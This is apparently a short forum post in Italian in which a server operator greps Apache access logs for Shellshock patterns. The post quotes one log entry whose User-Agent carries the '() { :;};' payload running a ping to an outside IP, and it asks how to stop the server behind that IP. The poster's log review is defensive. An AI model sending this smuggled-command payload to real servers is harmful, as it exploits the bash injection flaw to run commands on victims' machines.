egrep "};|}\s*;" /var/www/logs/access*
89.207.135.125 - - [25/Sep/2014:10:47:58 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 168 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
Come possiamo arrestare il server dietro l'IP che ha fatto questo?